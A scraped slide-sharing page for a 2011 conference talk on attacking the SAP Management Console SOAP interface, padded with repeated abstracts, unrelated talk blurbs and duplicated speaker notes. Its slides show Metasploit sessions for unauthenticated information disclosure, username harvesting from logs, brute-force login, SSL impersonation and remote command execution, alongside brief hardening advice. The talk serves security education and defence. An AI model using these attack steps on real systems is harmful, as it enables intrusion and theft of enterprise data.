SecZone 2011 - Cali, Colombia
(29th Nov. 2011)
SAP (in)security:
Scrubbing SAP clean with SOAP
------
Note
------
This is a slightly updated version of my Hashdays 2011 talk.
----------
Abstract:
----------
At the heart of any large enterprise, lies a platform misunderstood and feared by all but the bravest systems administrators. Home to a wealth of information, and key to infinite wisdom. This platform is SAP. For years this system has been amongst the many "red pen" items on penetration tests and audits alike... but no more! We will no longer accept the cries of "Business critical, out-of-scope". The time for SAP has come, the cross-hairs of attackers are firmly focused on the soft underbelly that is ERM, and it's our duty to follow suit. Join me as we take the first steps into exploring SAP, extracting information and popping shells. Leave your Nessus license at the door! It's time to scrub this SAP system clean with SOAP!
----------
Hashdays Conference (29th Oct. 2011)
SAP (in)security:
Scrubbing SAP clean with SOAP
----------
Abstract:
----------
At the heart of any large enterprise, lies a platform misunderstood and feared by all but the bravest systems administrators. Home to a wealth of information, and key to infinite wisdom. This platform is SAP. For years this system has been amongst the many "red pen" items on penetration tests and audits alike... but no more! We will no longer accept the cries of "Business critical, out-of-scope". The time for SAP has come, the cross-hairs of attackers are firmly focused on the soft underbelly that is ERM, and it's our duty to follow suit. Join me as we take the first steps into exploring SAP, extracting information and popping shells. Leave your Nessus license at the door! It's time to scrub this SAP system clean with SOAP!
----------
One thing that most programmers do not take the time to understand is the servers that their application lives on. Most know a smattering of Apache configs, PHP configs, and basic information about the OS. This talk will deal with looking at tools that can help you quickly set up a server and how it can help you be a better developer. We'll look at tools like puppet for server management, OSSEC for log management, different command line tools, and nagios/monit for system monitoring.
Hashdays Conference (29th Oct. 2011)
SAP (in)security:
Scrubbing SAP clean with SOAP
----------
Abstract:
----------
At the heart of any large enterprise, lies a platform misunderstood and feared by all but the bravest systems administrators. Home to a wealth of information, and key to infinite wisdom. This platform is SAP. For years this system has been amongst the many "red pen" items on penetration tests and audits alike... but no more! We will no longer accept the cries of "Business critical, out-of-scope". The time for SAP has come, the cross-hairs of attackers are firmly focused on the soft underbelly that is ERM, and it's our duty to follow suit. Join me as we take the first steps into exploring SAP, extracting information and popping shells. Leave your Nessus license at the door! It's time to scrub this SAP system clean with SOAP!
----------
One thing that most programmers do not take the time to understand is the servers that their application lives on. Most know a smattering of Apache configs, PHP configs, and basic information about the OS. This talk will deal with looking at tools that can help you quickly set up a server and how it can help you be a better developer. We'll look at tools like puppet for server management, OSSEC for log management, different command line tools, and nagios/monit for system monitoring.
Setting up a HADOOP 2.2 cluster on CentOS 6Manish Chopra
Create your own Hadoop distributed cluster using 3 virtual machines. Linux (CentOS 6 or RHEL 6) can be used, along with Java and Hadoop binary distributions.
http://www.alfresco.com/about/events/ondemand
Watch Richard Im, our prodigy Solutions Engineer, install Alfresco from scratch.
First, doing a custom install, and then, using the Windows installer.
The process will include:
Using the tomcat bundle:
The pros and cons of using the bundle
Custom start up options
Configuring open office connection
Ensuring imagemagick binaries on path
Ensure pdf2swf
Why we have these 3 binaries part of Alfresco.
Configure Alfresco Web Content Management
Configure your database
Configuring CIFS
how linux you configure ports
How to configure Alfresco Share remotely
Starting your evaluation of alfresco Explorer:
- Configuring your own document management scenarios using content models, aspects, rules and actions.
Starting your evaluation of Alfresco Share:
- Creating your own team site so you can start your collaboratin'
And now, doing it all over again!
Except this time with the Windows installer.
This will be a very hands-on webinar. So come prepared to take notes, and do some work yourself.
How to shutdown and power up of the netapp cluster mode storage systemSaroj Sahu
This slide will guide you how to shutdown and power up of the Netapp cluster mode storage system in command mode. (It will depict you environmental shutdown process (SAN environment in a DataCenter)
How to enable efficiency (deduplication and compression in netapp cluster mod...Saroj Sahu
This step by step implementation of deduplication and compression will make you easy to implement in your environment on the volume of Netapp storage. we will get lot of space savings which will benefit for customer and business can grow beyond our limitation.
Atmosphere Conference 2015: Taming the Modern DatacenterPROIDEA
Speaker: Seth Vargo
Language: English
Today we are plagued by hundreds of choices when architecting a modern data center. Should our machines be virtual or physical? Should we use containers or Docker? Should we use a public cloud provider or a private cloud provider? Which configuration management tool is best to use? What about IaaS, PaaS, and SaaS? It would be manageable if these were binary choices; however, we often find ourselves in a hybrid environment.
As more operations choices are added to your data center, whether through company acquisitions, a growing development team, or general technical debt, managing complexity between legacy and new systems becomes a nightmare. Yet the end goal is still the same — safely deploy your application to your infrastructure. We need to tame our data centers by managing change across systems, enforcing policies, and by establishing a workflow for both developers and operations engineers to build in a collaborative environment.
This talk will discuss the problems faced in the modern data center, and how a set of innovative open source tooling can be used to tame the rising complexity curve. Join me on an adventure with Vagrant, Consul, and Terraform as we take your data center from chaos to control.
Visit our website: http://atmosphere-conference.com/
Setting up a HADOOP 2.2 cluster on CentOS 6Manish Chopra
Create your own Hadoop distributed cluster using 3 virtual machines. Linux (CentOS 6 or RHEL 6) can be used, along with Java and Hadoop binary distributions.
http://www.alfresco.com/about/events/ondemand
Watch Richard Im, our prodigy Solutions Engineer, install Alfresco from scratch.
First, doing a custom install, and then, using the Windows installer.
The process will include:
Using the tomcat bundle:
The pros and cons of using the bundle
Custom start up options
Configuring open office connection
Ensuring imagemagick binaries on path
Ensure pdf2swf
Why we have these 3 binaries part of Alfresco.
Configure Alfresco Web Content Management
Configure your database
Configuring CIFS
how linux you configure ports
How to configure Alfresco Share remotely
Starting your evaluation of alfresco Explorer:
- Configuring your own document management scenarios using content models, aspects, rules and actions.
Starting your evaluation of Alfresco Share:
- Creating your own team site so you can start your collaboratin'
And now, doing it all over again!
Except this time with the Windows installer.
This will be a very hands-on webinar. So come prepared to take notes, and do some work yourself.
How to shutdown and power up of the netapp cluster mode storage systemSaroj Sahu
This slide will guide you how to shutdown and power up of the Netapp cluster mode storage system in command mode. (It will depict you environmental shutdown process (SAN environment in a DataCenter)
How to enable efficiency (deduplication and compression in netapp cluster mod...Saroj Sahu
This step by step implementation of deduplication and compression will make you easy to implement in your environment on the volume of Netapp storage. we will get lot of space savings which will benefit for customer and business can grow beyond our limitation.
Atmosphere Conference 2015: Taming the Modern DatacenterPROIDEA
Speaker: Seth Vargo
Language: English
Today we are plagued by hundreds of choices when architecting a modern data center. Should our machines be virtual or physical? Should we use containers or Docker? Should we use a public cloud provider or a private cloud provider? Which configuration management tool is best to use? What about IaaS, PaaS, and SaaS? It would be manageable if these were binary choices; however, we often find ourselves in a hybrid environment.
As more operations choices are added to your data center, whether through company acquisitions, a growing development team, or general technical debt, managing complexity between legacy and new systems becomes a nightmare. Yet the end goal is still the same — safely deploy your application to your infrastructure. We need to tame our data centers by managing change across systems, enforcing policies, and by establishing a workflow for both developers and operations engineers to build in a collaborative environment.
This talk will discuss the problems faced in the modern data center, and how a set of innovative open source tooling can be used to tame the rising complexity curve. Join me on an adventure with Vagrant, Consul, and Terraform as we take your data center from chaos to control.
Visit our website: http://atmosphere-conference.com/
SaltConf14 - Ben Cane - Using SaltStack in High Availability EnvironmentsSaltStack
An overview on the benefits and best practices of using SaltStack for consistency and automation in highly available enterprise environments such as financial services.
Caching and tuning fun for high scalabilityWim Godden
Caching has been a 'hot' topic for a few years. But caching takes more than merely taking data and putting it in a cache : the right caching techniques can improve performance and reduce load significantly. But we'll also look at some major pitfalls, showing that caching the wrong way can bring down your site. If you're looking for a clear explanation about various caching techniques and tools like Memcached, Nginx and Varnish, as well as ways to deploy them in an efficient way, this talk is for you.
This presentation was given to the Dublin Node (JS) Community on May 29th 2014.
Presented by: Chris Lawless, Kevin Yu Wei Xia, Fergal Carroll @phergalkarl, Ciarán Ó hUallacháin, and Aman Kohli @akohli
Like many others, WordPress has been my personal blogging tool for a long time. A powerful tool for easy publishing! That is what everyone wants.
Large sites like TechCrunch and TheNextWeb use it exactly for that reason. And more enterprises seem to discover it as good solution to their too-expensive publication tools. But keeping those WordPress instances running requires skills and knowledge.
Because of WordPress extendibility and its very active community, you can do this too. This tutorial will teach you how use Ansible, Composer, WP-CLI, WP REST API, and Elasticsearch can push WordPress from a personal blogging tool into an enterprise-worthy level application. Out with FTP based SCM ... in with automated deployment, dependency management, and utterly fast search.
Leveraging Open Source to Manage SAN Performancebrettallison
Scope - The primary focus of this presentation is how to leverage open source software to help in managing Shared Storage performance. The storage server will be the focus with particular emphasis on ESS. This solution is a small one-off solution.
Similar to SecZone 2011: Scrubbing SAP clean with SOAP (20)
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Ramesh Iyer
In today's fast-changing business world, Companies that adapt and embrace new ideas often need help to keep up with the competition. However, fostering a culture of innovation takes much work. It takes vision, leadership and willingness to take risks in the right proportion. Sachin Dev Duggal, co-founder of Builder.ai, has perfected the art of this balance, creating a company culture where creativity and growth are nurtured at each stage.
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf91mobiles
91mobiles recently conducted a Smart TV Buyer Insights Survey in which we asked over 3,000 respondents about the TV they own, aspects they look at on a new TV, and their TV buying preferences.
JMeter webinar - integration with InfluxDB and GrafanaRTTS
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
https://www.rttsweb.com/jmeter-integration-webinar
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Neuro-symbolic is not enough, we need neuro-*semantic*Frank van Harmelen
Neuro-symbolic (NeSy) AI is on the rise. However, simply machine learning on just any symbolic structure is not sufficient to really harvest the gains of NeSy. These will only be gained when the symbolic structures have an actual semantics. I give an operational definition of semantics as “predictable inference”.
All of this illustrated with link prediction over knowledge graphs, but the argument is general.
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Essentials of Automations: Optimizing FME Workflows with ParametersSafe Software
Are you looking to streamline your workflows and boost your projects’ efficiency? Do you find yourself searching for ways to add flexibility and control over your FME workflows? If so, you’re in the right place.
Join us for an insightful dive into the world of FME parameters, a critical element in optimizing workflow efficiency. This webinar marks the beginning of our three-part “Essentials of Automation” series. This first webinar is designed to equip you with the knowledge and skills to utilize parameters effectively: enhancing the flexibility, maintainability, and user control of your FME projects.
Here’s what you’ll gain:
- Essentials of FME Parameters: Understand the pivotal role of parameters, including Reader/Writer, Transformer, User, and FME Flow categories. Discover how they are the key to unlocking automation and optimization within your workflows.
- Practical Applications in FME Form: Delve into key user parameter types including choice, connections, and file URLs. Allow users to control how a workflow runs, making your workflows more reusable. Learn to import values and deliver the best user experience for your workflows while enhancing accuracy.
- Optimization Strategies in FME Flow: Explore the creation and strategic deployment of parameters in FME Flow, including the use of deployment and geometry parameters, to maximize workflow efficiency.
- Pro Tips for Success: Gain insights on parameterizing connections and leveraging new features like Conditional Visibility for clarity and simplicity.
We’ll wrap up with a glimpse into future webinars, followed by a Q&A session to address your specific questions surrounding this topic.
Don’t miss this opportunity to elevate your FME expertise and drive your projects to new heights of efficiency.
UiPath Test Automation using UiPath Test Suite series, part 3DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 3. In this session, we will cover desktop automation along with UI automation.
Topics covered:
UI automation Introduction,
UI automation Sample
Desktop automation flow
Pradeep Chinnala, Senior Consultant Automation Developer @WonderBotz and UiPath MVP
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
13. “…the world's leading provider of
business software, SAP (which stands for
"Systems, Applications, and Products in
Data Processing") delivers products and
services that help accelerate business
innovation for our customers.”
14. Other people describe them as…
“…the world's leading repository of
business critical information, SAP (which
stands for ”Security Ain't [our] Problem")
delivers products and services that help
attackers gain access to critical
enterprise data.”
19. So Many Reasons
Vulnerabilties are a part of it!
Every system has it‘s vulnerabilities
SAP installations often fall to business
Not an operations problem
Financial data should be handled by the business
Security team never gets close to it!
20. “YOU CAN'T TEST THAT, IT'S
BUSINESS CRITICAL!”
UNKNOWN PROJECT MANAGER
21.
22. You’re getting SOAP all over my SAP!
THIS TALK
SAP Security
Netweaver .
SOAP
33. SAP MC Communications
Default port 5<instance>13/14
50013 HTTP
50014 HTTPS
Can use SSL
If it‘s configured
More on this later!
34. SAP MC Communications
Uses Basic auth for some functions
Yes... It‘s 2011
Yes... Companies still use Basic Auth
Most functions don‘t even use that!
Yes... Unauthenticated!
44. Information is king
Version information
Sure, HTTP headers give that!
Nothing new here... mostly
Down to the patch-level
Can you say “targeted attack“
45. Version Information
msf auxiliary(sap_mgmt_con_version) > show options
Module options (auxiliary/scanner/sap/sap_mgmt_con_version):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no Use a proxy chain
RHOSTS 172.16.15.128 yes The target address range
RPORT 50013 yes The target port
THREADS 1 yes The number of threads
URI / no Path to the SAP MC
VHOST no HTTP server virtual host
46. Version Information
msf auxiliary(sap_mgmt_con_version) > show options
Module options (auxiliary/scanner/sap/sap_mgmt_con_version):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no Use a proxy chain
RHOSTS 172.16.15.128 yes The target address range
RPORT 50013 yes The target port
THREADS 1 yes The number of threads
URI / no Path to the SAP MC
VHOST no HTTP server virtual host
47. Version Information
msf auxiliary(sap_mgmt_con_version) > run
[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
[+] [SAP] Version Number Extracted - 172.16.15.128:50013
[+] [SAP] Version: 720, patch 70, changelist 1203517, optU, NTintel
[+] [SAP] SID: NSP
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
48. Version Information
msf auxiliary(sap_mgmt_con_version) > run
[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
[+] [SAP] Version Number Extracted - 172.16.15.128:50013
[+] [SAP] Version: 720, patch 70, changelist 1203517, optU, NTintel
[+] [SAP] SID: NSP
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
49. Information is king
Startup profile
Instance name
SAP System Name
SAP SID
SAP DB Schema
Paths
....
52. Information is king
Server / Instance Environment
Computername
OS Service userame
Database Names
Database Type (Oracle, MaxDB, ...)
Full Server Environment Variable list!
Information overload
OMG why!
54. Environment
msf auxiliary(sap_mgmt_con_getenv) > run
[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
[*] COMPUTERNAME=WINXPSAP-TST
[*] ComSpec=C:WINDOWSsystem32cmd.exe
[*] DBMS_TYPE=ada
[*] FP_NO_HOST_CHECK=NO
[*] OS=Windows_NT Operating System User
[*] USERNAME=SAPServiceNSP
[*] PSModulePath=C:windowssystem32PowerShell...
[*] SAPEXE=E:usrsapNSPSYSexeucNTI386
[*] TMP=E:usrsapNSPtmp
55. Information is king
SAP Log/Tracefiles
SAP Startup Logs
Error / Debug Logs
Developer Traces
Security Logs
SAP ABAPSysLog
SAP Startup Times
PIDs
Services + Status Info
57. Log/Trace Files
<SAPControl:ReadDeveloperTraceResponse>
<name>E:usrsapNSPDVEBMGS00workdev_w0<name>
<item>trc file: "dev_w0", trc level: 1, release: "720"</item>
<item>---------------------------------------------------</item>
<item>* ACTIVE TRACE LEVEL 1</item>
<item>M pid 3564</item>
<item>M DpSysAdmExtCreate: ABAP is active</item>
<item>M DpShMCreate: allocated sys_adm at 09A40048</item>
<item>M DpShMCreate: allocated wp_adm at 09A43020</item>
<item>M DpShMCreate: allocated tm_adm at 09A47E48</item>
…
58. ABAP Log File
<SAPControl:ABAPReadSyslogResponse><log>
<item><Time>2011 10 14 15:06:18</Time>
<Text>SAP: ICM started on host WINXPSAP-TST (PID: 3536)
</Text><Severity>SAPControl-GREEN</Severity>
<item><Time>2011 10 14 15:06:12</Time>
<Text>SAP Basis: Active ICU Version 3.4; Compiled With ICU 3.4;
Unicode Version 4.1
</Text><Severity>SAPControl-GREEN</Severity></item>
…
59. Information is king
Extracting data from logfiles
Logfiles include usernames
Scrape for SAP usernames
Instant brute-force user list!
Just an example of the data availble
62. Information is king
Process Parameters
Output of the entire SAP configuration
Password Policies
Setup your Brute-force just right ;)
Hash Types
Still supporting those old 8 char hashes?
Security Audit Log Enabled ?
rsau/enabled (default: 0)
Is anybody watching?
63. Process Parameters
msf auxiliary(sap_mgmt_con_getprocessparameter) > run
[*] [SAP] Connecting to SAP MC on 172.16.15.128:50013
[*] [SAP] Attempting to matche (?i-mx:^login/password)
[SAP] Process Parameters
Name Value
------ ----------
login/password_charset 1
login/password_downwards_compatibility 1
login/password_hash_algorithm encoding=RFC2307,
algorithm=iSSHA-1, saltsize=96
login/password_max_idle_productive 0
64. Process Parameters
msf auxiliary(sap_mgmt_con_getprocessparameter) > run
[*] [SAP] Connecting to SAP MC on 172.16.15.128:50013
[*] [SAP] Attempting to matche (?i-mx:^login/password)
[SAP] Process Parameters
Name Value
------ ----------
login/password_charset 1
login/password_downwards_compatibility 1
login/password_hash_algorithm encoding=RFC2307,
algorithm=iSSHA-1, saltsize=96
login/password_max_idle_productive 0
67. Information is king
Useful Process Parameters
rsau/enabled
login/password_downward_compatibility
login/failed_user_auto_unlock
login/fails_to_user_lock
login/min_password_lng
login/password_charset
....
*Checkout consolut.com for a great list
68. “I put a whitebox configuration audit
in your blackbox penetration test, so
you can whitebox SAP while you
blackbox it!“
Quote by:
Me, just now!
95. Getting in the middle
Device Default
Often the same on EVERY device
Not an option for SAP
96. Getting in the middle
Enterprise CA
You sign your own certs centrally
PKI Infrastructure
97. Getting in the middle
Externally signed
Diginotar to the rescue!
SAP also offer signing services
98. Getting in the middle
Impersonate SSL
There‘s a module for that!
Metasploit (ssl_impersonate.rb)
Creates a fake cert
As close to the original as possible
Useful SE options
Expired yesterday
Add CN names for ease of use
99. Getting in the middle
As near as darn a clone of the original
Fingerprints + Serial Number differ
100. Getting in the middle
All CN data is 100% cloned…
Average users don’t care!
108. Brute Force
msf auxiliary(sap_mgmt_con_brute_login) > set SAP_SID NSP
msf auxiliary(sap_mgmt_con_brute_login) > run
[*] SAPSID set to 'NSP' - Setting default SAP wordlist
[*] Trying username:'sapservicensp' password:''
[-] [01/18] - failed to login as 'sapservicensp' password: ''
[*] Trying username:'sapservicensp' password:'sapserviceNSP’
[-] [02/18] - failed to login as 'sapadm' password: ''
[*] Trying username:'nspadm' password:''
…
109. OSExecute
auxiliary(sap_..._osexec) > set RHOSTS 172.16.15.128
auxiliary(sap_..._osexec) > set USERNAME sapservicensp
auxiliary(sap_..._osexec) > set PASSWORD Pr0d@dm1n
auxiliary(sap_..._osexec) > set CMD hostname
auxiliary(sap_..._osexec) > run
[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface
[+] [SAP] Command run as PID: 1240
Command output
--------------
WINXPSAP-TST
119. Fixing the issues
SAP Fix
Note 1439348
Issue also discovered by Onapsis
No idea what it says!
SAP restrict ALL fix info to customers only
127. Big Thanks
The REAL SAP Security Researchers
Onapsis, DSecRG, Raul Siles, CYBSEC
SAP PSRT (for emailing me a lot)
DirtySec (You know who you are!)
MacLemon (for the PPT-fu)
ED
For inviting us, even though we cause problems!
All the people who helped make this happen
Yeah… I said that!SAP is a perfect goal for attackers. All the companies crown jewels in once place!
In 2010 SAP released more than 900 fixes… SAP is a complex product, and complex products always have flaws. Research into coding flaws show 15-50 bugs per 1000 lines of delivered code… not all are security related, but that’s still a lot of bugs!
It’s not ALL SAPs fault… complex configurations user error maintaining backwards compatibilitytake your pick. In offering so much SAP are their own worst enemy.
If security never see it, how can they secure itMore importantly, if they don‘t understand it, how can they ever hope to secure it!
Think aboutTHAT logic for a second!I‘m pretty sure every security professional has heard that at one point or another
So what’s this SOAP thing then
Not a cleaning product!We‘ll be use it to scrub SAP clean howeverI‘m sure lots of you have heard of Web ServicesSimply XML over HTTP or HTTPSFlexible (can run over SMTP...)SO HOW DOES SOAP FIT INTO OUR SAP TOPIC
Not a cleaning product!We‘ll be use it to scrub SAP clean howeverI‘m sure lots of you have heard of Web ServicesSimply XML over HTTP or HTTPSFlexible (can run over SMTP...)SO HOW DOES SOAP FIT INTO OUR SAP TOPIC
Yes it’s a sad sad world!SAP MC uses a range of unauthenticated requests, but some of the more fun functions require username/password authentication
Lots of cool dataLots of cool functionsLots of fun to be had!
There’s pages of this stuff… much too much for a slide… and much too much to make this stuff available for attackers!
dbms_typeThe database interface recognizes the type of the database system by the environment variable dbms_type.Possible values: ora, inf, db2, db4, db6, ada, mssOLDER VERSIONS of SAP can include environment variables such as MSSQL_USER
Effect of password policies on keyspace reduction openwallDifferent password compliance rules can reduce the overall keyspace considerably!
Lots of cool dataLots of cool functionsLots of fun to be had!
Lots of cool dataLots of cool functionsLots of fun to be had!
Lots of cool dataLots of cool functionsLots of fun to be had!
Lots of cool dataLots of cool functionsLots of fun to be had!
Lots of cool dataLots of cool functionsLots of fun to be had!
Lots of cool dataLots of cool functionsLots of fun to be had!
So I scanned a small country!
What do we have already- Full server environment Version info SAP SIDDatabase info valid SAP usernames trace and debug logs
Wait... SSL will save us!
Yep.. It’s a feature remember? But we’ve already covered how we could get that
dbms_typeThe database interface recognizes the type of the database system by the environment variable dbms_type.Possible values: ora, inf, db2, db4, db6, ada, mssOLDER VERSIONS of SAP can include environment variables such as MSSQL_USER
Yep.. It’s a feature remember? But we’ve already covered how we could get that
OSExecute is all well and good...Run a single commandGet the response..
Block itFilter itRestrict it to administratorsYES this means internally as well!
Block itFilter itRestrict it to administratorsYES this means internally as well!
Block itFilter itRestrict it to administratorsYES this means internally as well!
Block itFilter itRestrict it to administratorsYES this means internally as well!
Block itFilter itRestrict it to administratorsYES this means internally as well!
Block itFilter itRestrict it to administratorsYES this means internally as well!
Block itFilter itRestrict it to administratorsYES this means internally as well!